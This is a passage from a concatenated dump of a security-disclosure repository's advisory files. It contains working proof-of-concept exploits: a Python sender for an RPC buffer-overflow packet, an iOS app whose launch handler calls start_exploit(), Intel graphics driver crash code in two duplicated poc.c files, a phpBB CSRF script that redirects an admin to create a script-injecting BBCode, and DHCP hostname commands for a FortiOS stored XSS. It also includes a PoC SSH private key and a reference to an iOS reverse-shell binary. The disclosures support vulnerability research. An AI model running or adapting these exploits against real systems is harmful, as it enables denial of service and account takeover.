17 | As previously mentioned, the vulnerability is inside the RPC component. The vulnerable function, which contains the buffer overflow, is _svcauth_unix. At _svcauth_unix + 0x67, the function reads the value 0xffffffff from the malicious packet (the packet content is shown later). 18 | 19 | 20 | 21 | Afterwards, at the instruction cmp eax, 0FFh, it checks whether the value (the packet content size) is greater than 255 without considering that the value may be negative: read as a signed integer, 0xffffffff is -1 and passes the check. The value 0xffffffff is then used as the third parameter (nbytes) of the bcopy function, which finally causes a buffer overflow. A size check that treats the length as unsigned, or that also rejects negative values, would reject this packet. 22 | 23 | 24 | 25 | This is the packet that will be sent to the RPC Service: 26 | 27 | 28 | 29 | **Exploit**
30 | ```python 31 | import socket 32 | 33 | host = "192.168.15.199" 34 | rpcPort = 111 35 | 36 | f = open("pkt", 'rb') # pkt is the file which contains the payload to send. 37 | data = f.read() 38 | f.close() 39 | 40 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 41 | sock.connect((host, rpcPort)) 42 | sock.send(data) 43 | sock.close() 44 | ``` 45 | 46 | 47 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend (code)/AppDelegate.h: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.h 3 | // powend 4 | // 5 | // Created by simo on 30/08/2018. 6 | // Copyright © 2018 simo ghannam. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface AppDelegate : UIResponder 12 | 13 | @property (strong, nonatomic) UIWindow *window; 14 | 15 | 16 | @end 17 | 18 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend (code)/AppDelegate.m: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.m 3 | // powend 4 | // 5 | // Created by simo on 30/08/2018. 6 | // Copyright © 2018 simo ghannam. All rights reserved. 7 | // 8 | 9 | #import "AppDelegate.h" 10 | #import "code.h" 11 | 12 | @interface AppDelegate () 13 | 14 | @end 15 | 16 | @implementation AppDelegate 17 | 18 | 19 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { 20 | // Override point for customization after application launch. 21 | //do_powend(); 22 | start_exploit(); 23 | return YES; 24 | } 25 | 26 | 27 | - (void)applicationWillResignActive:(UIApplication *)application { 28 | // Sent when the application is about to move from active to inactive state. 
This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 29 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. 30 | } 31 | 32 | 33 | - (void)applicationDidEnterBackground:(UIApplication *)application { 34 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 35 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 36 | } 37 | 38 | 39 | - (void)applicationWillEnterForeground:(UIApplication *)application { 40 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. 41 | } 42 | 43 | 44 | - (void)applicationDidBecomeActive:(UIApplication *)application { 45 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 46 | } 47 | 48 | 49 | - (void)applicationWillTerminate:(UIApplication *)application { 50 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 
51 | } 52 | 53 | 54 | @end 55 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend (code)/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "iphone", 5 | "size" : "20x20", 6 | "scale" : "2x" 7 | }, 8 | { 9 | "idiom" : "iphone", 10 | "size" : "20x20", 11 | "scale" : "3x" 12 | }, 13 | { 14 | "idiom" : "iphone", 15 | "size" : "29x29", 16 | "scale" : "2x" 17 | }, 18 | { 19 | "idiom" : "iphone", 20 | "size" : "29x29", 21 | "scale" : "3x" 22 | }, 23 | { 24 | "idiom" : "iphone", 25 | "size" : "40x40", 26 | "scale" : "2x" 27 | }, 28 | { 29 | "idiom" : "iphone", 30 | "size" : "40x40", 31 | "scale" : "3x" 32 | }, 33 | { 34 | "idiom" : "iphone", 35 | "size" : "60x60", 36 | "scale" : "2x" 37 | }, 38 | { 39 | "idiom" : "iphone", 40 | "size" : "60x60", 41 | "scale" : "3x" 42 | }, 43 | { 44 | "idiom" : "ipad", 45 | "size" : "20x20", 46 | "scale" : "1x" 47 | }, 48 | { 49 | "idiom" : "ipad", 50 | "size" : "20x20", 51 | "scale" : "2x" 52 | }, 53 | { 54 | "idiom" : "ipad", 55 | "size" : "29x29", 56 | "scale" : "1x" 57 | }, 58 | { 59 | "idiom" : "ipad", 60 | "size" : "29x29", 61 | "scale" : "2x" 62 | }, 63 | { 64 | "idiom" : "ipad", 65 | "size" : "40x40", 66 | "scale" : "1x" 67 | }, 68 | { 69 | "idiom" : "ipad", 70 | "size" : "40x40", 71 | "scale" : "2x" 72 | }, 73 | { 74 | "idiom" : "ipad", 75 | "size" : "76x76", 76 | "scale" : "1x" 77 | }, 78 | { 79 | "idiom" : "ipad", 80 | "size" : "76x76", 81 | "scale" : "2x" 82 | }, 83 | { 84 | "idiom" : "ipad", 85 | "size" : "83.5x83.5", 86 | "scale" : "2x" 87 | }, 88 | { 89 | "idiom" : "ios-marketing", 90 | "size" : "1024x1024", 91 | "scale" : "1x" 92 | } 93 | ], 94 | "info" : { 95 | "version" : 1, 96 | "author" : "xcode" 97 | } 98 | } -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend 
(code)/Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "version" : 1, 4 | "author" : "xcode" 5 | } 6 | } -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend (code)/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend (code)/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend (code)/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | $(DEVELOPMENT_LANGUAGE) 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | APPL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | LSRequiresIPhoneOS 22 | 23 | UILaunchStoryboardName 24 | LaunchScreen 25 | UIMainStoryboardFile 26 | Main 27 | UIRequiredDeviceCapabilities 28 | 29 | armv7 30 | 31 | UISupportedInterfaceOrientations 32 | 33 | UIInterfaceOrientationPortrait 34 | UIInterfaceOrientationLandscapeLeft 35 | UIInterfaceOrientationLandscapeRight 36 | 37 | UISupportedInterfaceOrientations~ipad 38 | 39 | UIInterfaceOrientationPortrait 40 | UIInterfaceOrientationPortraitUpsideDown 41 | UIInterfaceOrientationLandscapeLeft 42 | 
UIInterfaceOrientationLandscapeRight 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend (code)/ViewController.h: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.h 3 | // powend 4 | // 5 | // Created by simo on 30/08/2018. 6 | // Copyright © 2018 simo ghannam. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface ViewController : UIViewController 12 | 13 | 14 | @end 15 | 16 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend (code)/ViewController.m: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.m 3 | // powend 4 | // 5 | // Created by simo on 30/08/2018. 6 | // Copyright © 2018 simo ghannam. All rights reserved. 7 | // 8 | 9 | #import "ViewController.h" 10 | 11 | @interface ViewController () 12 | 13 | @end 14 | 15 | @implementation ViewController 16 | 17 | - (void)viewDidLoad { 18 | [super viewDidLoad]; 19 | // Do any additional setup after loading the view, typically from a nib. 20 | } 21 | 22 | 23 | - (void)didReceiveMemoryWarning { 24 | [super didReceiveMemoryWarning]; 25 | // Dispose of any resources that can be recreated. 26 | } 27 | 28 | 29 | @end 30 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend (code)/main.m: -------------------------------------------------------------------------------- 1 | // 2 | // main.m 3 | // powend 4 | // 5 | // Created by simo on 30/08/2018. 6 | // Copyright © 2018 simo ghannam. All rights reserved. 
7 | // 8 | 9 | #import 10 | #import "AppDelegate.h" 11 | 12 | int main(int argc, char * argv[]) { 13 | @autoreleasepool { 14 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class])); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend (code)/powend.entitlements: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | com.apple.security.application-groups 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IDEDidComputeMac32BitWarning 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend.xcodeproj/project.xcworkspace/xcuserdata/simo.xcuserdatad/UserInterfaceState.xcuserstate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 3944/powend.xcodeproj/project.xcworkspace/xcuserdata/simo.xcuserdatad/UserInterfaceState.xcuserstate -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend.xcodeproj/xcuserdata/simo.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 8 | 20 | 21 | 22 | 24 | 36 | 37 | 38 | 40 | 52 | 53 | 54 | 56 | 66 | 67 | 68 | 69 | 70 | 
-------------------------------------------------------------------------------- /SSD Advisory - 3944/powend.xcodeproj/xcuserdata/simo.xcuserdatad/xcschemes/xcschememanagement.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SchemeUserState 6 | 7 | powend.xcscheme 8 | 9 | orderHint 10 | 0 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powendTests/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | $(DEVELOPMENT_LANGUAGE) 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | BNDL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | 22 | 23 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powendTests/powendTests.m: -------------------------------------------------------------------------------- 1 | // 2 | // powendTests.m 3 | // powendTests 4 | // 5 | // Created by simo on 30/08/2018. 6 | // Copyright © 2018 simo ghannam. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface powendTests : XCTestCase 12 | 13 | @end 14 | 15 | @implementation powendTests 16 | 17 | - (void)setUp { 18 | [super setUp]; 19 | // Put setup code here. This method is called before the invocation of each test method in the class. 20 | } 21 | 22 | - (void)tearDown { 23 | // Put teardown code here. This method is called after the invocation of each test method in the class. 24 | [super tearDown]; 25 | } 26 | 27 | - (void)testExample { 28 | // This is an example of a functional test case. 29 | // Use XCTAssert and related functions to verify your tests produce the correct results. 
30 | } 31 | 32 | - (void)testPerformanceExample { 33 | // This is an example of a performance test case. 34 | [self measureBlock:^{ 35 | // Put the code you want to measure the time of here. 36 | }]; 37 | } 38 | 39 | @end 40 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powendUITests/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | $(DEVELOPMENT_LANGUAGE) 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | BNDL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | 22 | 23 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powendUITests/powendUITests.m: -------------------------------------------------------------------------------- 1 | // 2 | // powendUITests.m 3 | // powendUITests 4 | // 5 | // Created by simo on 30/08/2018. 6 | // Copyright © 2018 simo ghannam. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface powendUITests : XCTestCase 12 | 13 | @end 14 | 15 | @implementation powendUITests 16 | 17 | - (void)setUp { 18 | [super setUp]; 19 | 20 | // Put setup code here. This method is called before the invocation of each test method in the class. 21 | 22 | // In UI tests it is usually best to stop immediately when a failure occurs. 23 | self.continueAfterFailure = NO; 24 | // UI tests must launch the application that they test. Doing this in setup will make sure it happens for each test method. 25 | [[[XCUIApplication alloc] init] launch]; 26 | 27 | // In UI tests it’s important to set the initial state - such as interface orientation - required for your tests before they run. The setUp method is a good place to do this. 
28 | } 29 | 30 | - (void)tearDown { 31 | // Put teardown code here. This method is called after the invocation of each test method in the class. 32 | [super tearDown]; 33 | } 34 | 35 | - (void)testExample { 36 | // Use recording to get started writing UI tests. 37 | // Use XCTAssert and related functions to verify your tests produce the correct results. 38 | } 39 | 40 | @end 41 | -------------------------------------------------------------------------------- /SSD Advisory - 3987/readme.md: -------------------------------------------------------------------------------- 1 | # SSD Advisory - Fortigate DHCP Stored XSS 2 | 3 | **Vulnerability Summary** 4 | The following advisory describes a Stored XSS Vulnerability found in Fortinet's Fortigate Firewall(FortiOS) via an unauthenticated DHCP packet. 5 | 6 | **CVE** 7 | CVE-2019-6697 8 | 9 | **Credit** 10 | An independent Security Researcher, Toshitsugu Yoneyama, has reported this vulnerability to SSD Secure Disclosure program. 11 | 12 | **Affected systems** 13 | FortiOS v6.0.4 build 0231. 14 | 15 | **Vendor Response** 16 | Fortigate has fixed the vulnerability in FortiOS version 6.2.2 17 | 18 | **Vulnerability Details** 19 | An unauthenticated attacker can trigger a Stored XSS Vulnerability via a malicious DHCP packet in the Fortigate DHCP Monitor. This can happen if Device Detection is enabled through Network >Interface > Edit Interface > Device Detection 20 | 21 | ![](https://ssd-disclosure.com/wp-content/uploads/2019/07/fortigate_device_detection.png) 22 | When this option is enabled the attacker may perform the following steps in order to exploit the vulnerability: 23 | 24 | 1. Install dhtest or any other tool that can send arbitrary DHCP packets. 25 | (https://sargandh.wordpress.com/2012/02/23/linux-dhcp-client-simulation-tool/) 26 | 2. Send a malicious DHCP packet. 
For example: 27 | 28 | ``` 29 | #./dhtest-master/dhtest -i eth0 -m 12:34:56:78:90:12 -h "xx" 30 | [Option] 31 | -m : mac address 32 | -h : hostname(dhcp option 12). The attacker can inject malicious scripts. 33 | ``` 34 | 35 | 3. Once the victim logs into Fortigate's dashboard and opens the "DHCP Monitor" 36 | (https://<fortigate-address>/ng/dhcp/monitor), the browser will execute the malicious script injected by the attacker. 37 | 38 | ![](https://ssd-disclosure.com/wp-content/uploads/2019/07/fortigate_alert_popup.png) 39 | 40 | But there are a few limitations: 41 | The user's input is validated, so some HTML tags and other similar options cannot be used. There are also character count limits: 42 | 43 | * DHCP option 12 has a string size limit allowing only up to 256 characters. More information about this option is available in the RFC. 44 | * On the Fortigate side, the string can't be longer than 128 characters. 45 | 46 | However, Fortigate uses jQuery, which allows the attacker to bypass the mentioned restrictions and execute arbitrary scripts using the following method. The bypass shows that input filtering and length limits did not prevent script execution here; a value such as a DHCP hostname has to be encoded for the HTML context when it is displayed. 47 | 48 | ``` 49 | #./dhtest-master/dhtest -i eth0 -m 12:34:56:78:90:12 -h "xx" 50 | ``` -------------------------------------------------------------------------------- /SSD Advisory - 3991/poc.c: -------------------------------------------------------------------------------- 1 | #define BUF_SIZE 100 2 | 3 | static const char* intel = "Intel"; 4 | 5 | typedef struct { 6 | UINT unknown1; 7 | UINT unknown2; 8 | UINT escape_jmp_table_index; 9 | UINT switchcase_index; 10 | char buffer[BUF_SIZE]; 11 | } PrivateDriverData; 12 | 13 | int main() 14 | { 15 | int result = 0; 16 | DRIVER_INFO driverInfo = { 0 }; 17 | D3DKMT_ESCAPE escapeObj = { 0 }; 18 | PrivateDriverData data = { 0 }; 19 | int status = initDriver(&driverInfo, intel); 20 | if (!NT_SUCCESS(status)) { 21 | printf("Could not initialize connection to driver"); 22 | return -1; 23 | } 24 | printf("[+] Initialized driver\n"); 25 | escapeObj.Type = 
D3DKMT_ESCAPE_DRIVERPRIVATE; 26 | escapeObj.hAdapter = driverInfo.hAdapter; 27 | escapeObj.hDevice = (D3DKMT_HANDLE)NULL; 28 | data.unknown1 = 'AAAA'; 29 | data.unknown2 = 'BBBB'; 30 | data.escape_jmp_table_index = 1; 31 | data.switchcase_index = 205; // vulnerable case 32 | memset(data.buffer, 'A', BUF_SIZE); 33 | 34 | escapeObj.pPrivateDriverData = (void*)&data; 35 | escapeObj.PrivateDriverDataSize = sizeof(data); 36 | status = D3DKMTEscape(&escapeObj); // Will not return, it will crash the system. 37 | if (!NT_SUCCESS(status)) { 38 | printf("[-] D3DKMTEscape failed (%x)", status); 39 | } 40 | getchar(); 41 | return 0; 42 | } 43 | -------------------------------------------------------------------------------- /SSD Advisory - 4002/poc.c: -------------------------------------------------------------------------------- 1 | #define BUF_SIZE 100 2 | 3 | static const char* intel = "Intel"; 4 | 5 | typedef struct { 6 | UINT unknown1; 7 | UINT unknown2; 8 | UINT escape_jmp_table_index; 9 | UINT switchcase_index; 10 | char buffer[BUF_SIZE]; 11 | } PrivateDriverData; 12 | 13 | int main() 14 | { 15 | int result = 0; 16 | DRIVER_INFO driverInfo = { 0 }; 17 | D3DKMT_ESCAPE escapeObj = { 0 }; 18 | PrivateDriverData data = { 0 }; 19 | int status = initDriver(&driverInfo, intel); 20 | if (!NT_SUCCESS(status)) { 21 | printf("Could not initialize connection to driver"); 22 | return -1; 23 | } 24 | printf("[+] Initialized driver\n"); 25 | escapeObj.Type = D3DKMT_ESCAPE_DRIVERPRIVATE; 26 | escapeObj.hAdapter = driverInfo.hAdapter; 27 | escapeObj.hDevice = (D3DKMT_HANDLE)NULL; 28 | data.unknown1 = 'AAAA'; 29 | data.unknown2 = 'BBBB'; 30 | data.escape_jmp_table_index = 1; 31 | data.switchcase_index = 205; // vulnerable case 32 | memset(data.buffer, 'A', BUF_SIZE); 33 | 34 | escapeObj.pPrivateDriverData = (void*)&data; 35 | escapeObj.PrivateDriverDataSize = sizeof(data); 36 | status = D3DKMTEscape(&escapeObj); // Will not return, it will crash the system. 
37 | if (!NT_SUCCESS(status)) { 38 | printf("[-] D3DKMTEscape failed (%x)", status); 39 | } 40 | getchar(); 41 | return 0; 42 | } 43 | -------------------------------------------------------------------------------- /SSD Advisory - 4007/poc/avatar.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4007/poc/avatar.png -------------------------------------------------------------------------------- /SSD Advisory - 4007/poc/poc.php: -------------------------------------------------------------------------------- 1 | customCode(). 7 | $custom_shortcode = "[xss]{TEXT}[/xss]"; 8 | 9 | // the HTML replacement. You can also hardcore the code between the script tags. 10 | $shortcode_replacement = ""; 11 | 12 | 13 | // If a session ID is available, attempt the CSRF exploit 14 | if(strpos($_SERVER['HTTP_REFERER'], 'sid') !== false) { 15 | 16 | // leak the session ID of the nonce 17 | $parts = parse_url($_SERVER['HTTP_REFERER']); 18 | parse_str($parts['query'], $query); 19 | 20 | if(!isset($query['sid'])) { 21 | header('Content-Type: image/png'); 22 | $img = imagecreatefrompng('avatar.png'); 23 | imagepng($img); 24 | die; 25 | } 26 | 27 | 28 | // build the CSRF payload 29 | $payload = http_build_query( 30 | array( 31 | 'bbcode_match' => $custom_shortcode, 32 | 'bbcode_tpl' => $shortcode_replacement, 33 | 'i' => 'acp_bbcodes', 34 | 'mode' => 'bbcodes', 35 | 'action' => 'create', 36 | 'sid' => $query['sid'] 37 | ) 38 | ); 39 | 40 | // adm is the default admin URL 41 | $exploit_url = $target_url . "/adm/?" . $payload; 42 | 43 | header('Location: ' . 
$exploit_url); 44 | } else { 45 | header('Content-Type: image/png'); 46 | $img = imagecreatefrompng('avatar.png'); 47 | imagepng($img); 48 | die; 49 | } 50 | -------------------------------------------------------------------------------- /SSD Advisory - 4033/poc/id_xmss: -------------------------------------------------------------------------------- 1 | -----BEGIN OPENSSH PRIVATE KEY----- 2 | b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAdQAAABRzc2gteG 3 | 1zc0BvcGVuc3NoLmNvbQAAABVYTVNTX1NIQTItMjU2X1cxNl9IMTAAAABA6AGQGHXMA73w 4 | KLpuqU8Ht02RurQk3BDTApfcvoG6H+aX6Lo1AAPueXtOyDYOncuYYAkzWctIw6eZoJLjyc 5 | CS9wAABoDxTenn8U3p5wAAABRzc2gteG1zc0BvcGVuc3NoLmNvbQAAABVYTVNTX1NIQTIt 6 | MjU2X1cxNl9IMTAAAABA6AGQGHXMA73wKLpuqU8Ht02RurQk3BDTApfcvoG6H+aX6Lo1AA 7 | PueXtOyDYOncuYYAkzWctIw6eZoJLjycCS9wAAAIQAAAAAGysMKp3xNmQpvFt5EsYl3dfa 8 | fuZC3M/JhpLzPBvD2C13tdMvPJ5UHkxRblS3mMN4F2ra/4qwu4Q7fQvTeW3GSJfoujUAA+ 9 | 55e07INg6dy5hgCTNZy0jDp5mgkuPJwJL36AGQGHXMA73wKLpuqU8Ht02RurQk3BDTApfc 10 | voG6H+YCAAAAFmFlczI1Ni1nY21Ab3BlbnNzaC5jb20AAAAsw318Sx+otYjbbKMVuyT0TM 11 | UK4aDVOuID76y1cJBlwoMUT0BA6xtNtYnFvz8AAAADaz0yAAAAAAAAAWAAAAAAAAAAAAAA 12 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 13 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 14 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 15 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 16 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 17 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 18 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsAAAAAAAAAAAAAAAAAAUDvkV 19 | v62WIvfLPhjAanr8A0S6qxqsr0/WpQjlZ2aDzgQCqjcpqVJtBF6N8lXUGJWs590NXCjFAP 20 | 2OUi7t75JaCveqDRUDYlbzRpTM4G1Xa2UkcguSfqumKUhZtSTE5TwfxSbpT3K0eyT8JCOb 21 | 6kfD3nVEI8beTATGwSa1WhV4hByk4MhFbFpRALx5Bu3W5+E1lj3XGIeScPBdoKY2V04Y3K 22 | s+3kqreuLQVpjLNYD7+fwTCyFM1eMHusRQpFfAQSTgE8hXYeSMwbCleJv7bmkISlhaXfnz 23 | 
iISeuGU+zjbPj5uBRHfN4iT+VUVOuCm+iPMj4C95l+ZJGYkVWyAKm+AQ8wADOQsEWvvyOu 24 | H8mgtGU/yAP7V22EwGN5/ftDJPh2n5Ikw6nrMVXRMVerrlHm+pA5vUj6zr3u/ufzU+VmVl 25 | aMoAAAAKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 26 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 27 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 28 | AAAAAAAAAAAAAAABACGii5b5S7WzKhiJ6mmYj7Hg4CugAY4RHisa7gJbTbU3gYkH+SOzj5 29 | ph6Rj83WqLnUlKbIXQ7QmPBBvRaQfdKoSR8xKQtW27Vq4c1Y94nGzpWezBqs5KeB5ywzoT 30 | EuNM9885zK+GajrFMG9QaZsSTniDAW/qUw2Is8rHPJYFp12ISxIvn/L3u7oMVokyAlnlbH 31 | YDqFejUHwc2qErM3eeLaxhl5y65/vLch2jHNI6xj0SSGdBwRY2r1RQJ2P6ozA4EfWjtRBB 32 | kGEu4kbCz9+7e5lEnUTJ8hVKnPRuvNKPAY5xlGUQPTq5SfwZbKY7n30lJTx0epe51VfnBq 33 | 5yp1AZEHIAAAAgP2YsjdTrhEgbgusAYs3ukByjGcNBRp7BgpGNWyaQBfYAAAAIAAAAAAAA 34 | AAAAAAAAAQAAAAAAAAABAAAAAAAAAAABAAAAIAAAAAIAAAAAAAAAAAEAAABAAAAAAwAAAA 35 | AAAAAAAQAAAGAAAAAEAAAAAAAAAAABAAAAgAAAAAUAAAAAAAAAAAEAAACgAAAABgAAAAAA 36 | AAAAAQAAAMAAAAAHAAAAAAAAAAABAAAA4AAAAAtyb290QHVidW50dQECAw== 37 | -----END OPENSSH PRIVATE KEY----- 38 | -------------------------------------------------------------------------------- /SSD Advisory - 4033/poc/sshd_config: -------------------------------------------------------------------------------- 1 | Port 65535 2 | 3 | HostkeyAlgorithms ssh-xmss@openssh.com,ssh-xmss-cert-v01@openssh.com 4 | PubkeyAcceptedKeyTypes ssh-xmss@openssh.com,ssh-xmss-cert-v01@openssh.com 5 | 6 | # Change this to the full path of the xmss key 7 | HostKey /root/XMSS/p_xmss_bug/id_xmss 8 | 9 | PermitRootLogin yes 10 | 11 | ChallengeResponseAuthentication no 12 | 13 | AcceptEnv LANG LC_* 14 | 15 | PasswordAuthentication no -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/IOKit.framework/Versions/A/IOKit: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/IOKit.framework/Versions/A/IOKit -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/ios_reverseshell: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/ios_reverseshell -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019.xcodeproj/project.xcworkspace/xcuserdata/aa.xcuserdatad/UserInterfaceState.xcuserstate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019.xcodeproj/project.xcworkspace/xcuserdata/aa.xcuserdatad/UserInterfaceState.xcuserstate -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019.xcodeproj/xcuserdata/aa.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019.xcodeproj/xcuserdata/aa.xcuserdatad/xcschemes/xcschememanagement.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SchemeUserState 6 | 7 | 
